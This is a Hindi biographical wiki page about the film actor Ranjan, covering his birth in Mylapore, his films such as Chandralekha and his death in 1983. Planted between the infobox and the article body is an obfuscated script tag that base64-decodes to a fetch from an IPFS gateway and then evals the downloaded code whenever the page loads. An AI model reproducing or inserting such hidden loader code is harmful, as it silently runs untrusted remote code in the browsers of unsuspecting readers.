रंजन (अभिनेता)

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
रंजन (अभिनेता)
रंजन
पूरा नाम रामनारायण वेंकटरमण शर्मा
प्रसिद्ध नाम रंजन
जन्म 1918
जन्म भूमि मयलापुर, मद्रास
मृत्यु 12 सितम्बर, 1983
मृत्यु स्थान न्यू जर्सी, अमेरिका
कर्म-क्षेत्र अभिनेता, गायक, पत्रकार
मुख्य फ़िल्में चन्द्रलेखा (1948), मंगला (1951), सपेरा (1961), मदारी (1959), राम बलराम (1980) आदि
शिक्षा कला स्नातक
विद्यालय मद्रास कॉलेज
नागरिकता भारतीय

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

रंजन (अंग्रेज़ी: Ranjan, वास्तविक नाम: 'रामनारायण वेंकटरमण शर्मा', जन्म: 1918 - मृत्यु: 12 सितम्बर, 1983) एक प्रसिद्ध अभिनेता, गायक, पत्रकार और लेखक थे। उन्होंने फ़िल्म 'अशोक कुमार' (1941) के साथ फ़िल्मों में पदार्पण किया लेकिन उन्हें एस. एस. वासन की फ़िल्म 'चन्द्रलेखा' (1948) से पहचान मिली।

जीवन परिचय

रंजन का जन्म 1918 में मयलापुर, मद्रास में हुआ था। इनका परिवार श्रीरंगम, तमिलनाडु का रहने वाला था। रंजन ने मद्रास स्कूल से अपनी स्कूली शिक्षा प्राप्त की और कला में स्नातक की डिग्री पाई। रंजन अपने कॉलेज के दिनों से ही नाटकों में अभिनय करते थे।

प्रसिद्ध फ़िल्में

  • चन्द्रलेखा (1948)
  • मंगला (1951)
  • सपेरा (1961)
  • मदारी (1959)
  • राम बलराम (1980)

निधन

रंजन का निधन 12 सितम्बर, 1983 को न्यू जर्सी, अमेरिका में हृदयाघात के कारण हुआ तब वे मात्र 65 वर्ष के थे।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ


बाहरी कड़ियाँ

संबंधित लेख